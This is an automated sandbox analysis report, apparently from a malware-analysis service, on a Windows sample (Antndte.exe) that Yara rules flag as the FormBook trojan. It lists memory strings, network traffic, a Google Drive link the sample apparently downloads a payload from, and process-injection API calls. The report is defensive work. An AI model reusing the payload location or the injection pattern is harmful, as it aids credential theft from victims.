73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:28:47 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 04 Dec 2023 14:29:24 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:29:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:30:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Antndte.exe, 00000000.00000000.9659783215.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Antndte.exe, 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Antndte.exe, 00000002.00000000.9886080222.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: Antndte.exe, 00000002.00000001.9887364780.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Antndte.exe, 00000002.00000001.9887364780.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005389000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/c
        Source: Antndte.exe, 00000002.00000002.10097194599.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.000000000540F000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985973812.000000000540E000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004462210.000000000540E000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004311607.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfq
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/l
        Source: Antndte.exe, 00000002.00000002.10108976689.0000000034AD0000.00000004.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10096947638.0000000005348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3j
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3oNL
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
        Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
        Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:50129 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:50130 version: TLS 1.2
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F34E0 NtCreateMutant,LdrInitializeThunk,2_2_357F34E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_357F2D10
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_357F2B90
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F4570 NtSuspendThread,2_2_357F4570
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F4260 NtSetContextThread,2_2_357F4260
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2D50 NtWriteVirtualMemory,2_2_357F2D50
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2DC0 NtAdjustPrivilegesToken,2_2_357F2DC0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2DA0 NtReadVirtualMemory,2_2_357F2DA0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C50 NtUnmapViewOfSection,2_2_357F2C50
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F3C30 NtOpenProcessToken,2_2_357F3C30
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C30 NtMapViewOfSection,2_2_357F2C30
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C20 NtSetInformationFile,2_2_357F2C20
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C10 NtOpenProcess,2_2_357F2C10
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2CF0 NtDelayExecution,2_2_357F2CF0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2CD0 NtEnumerateKey,2_2_357F2CD0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F3C90 NtOpenThread,2_2_357F3C90
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00404C620_2_00404C62
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00406ADD0_2_00406ADD
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004072B40_2_004072B4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358775C62_2_358775C6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587F5C92_2_3587F5C9
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3588A5262_2_3588A526
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C04452_2_357C0445
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C27602_2_357C2760
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CA7602_2_357CA760
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358767572_2_35876757
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E46702_2_357E4670
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587A6C02_2_3587A6C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358336EC2_2_358336EC
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587F6F62_2_3587F6F6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DC6002_2_357DC600
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BC6E02_2_357BC6E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585D62C2_2_3585D62C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586D6462_2_3586D646
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C06802_2_357C0680
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF1132_2_357AF113
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3588010E2_2_3588010E
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DB1E02_2_357DB1E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585D1302_2_3585D130
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C51C02_2_357C51C0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3580717A2_2_3580717A
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358770F12_2_358770F1
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CB0D02_2_357CB0D0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B00A02_2_357B00A0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586E0762_2_3586E076
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CE3102_2_357CE310
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587F3302_2_3587F330
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B13802_2_357B1380
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AD2EC2_2_357AD2EC
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C0D692_2_357C0D69
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585FDF42_2_3585FDF4
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BAD002_2_357BAD00
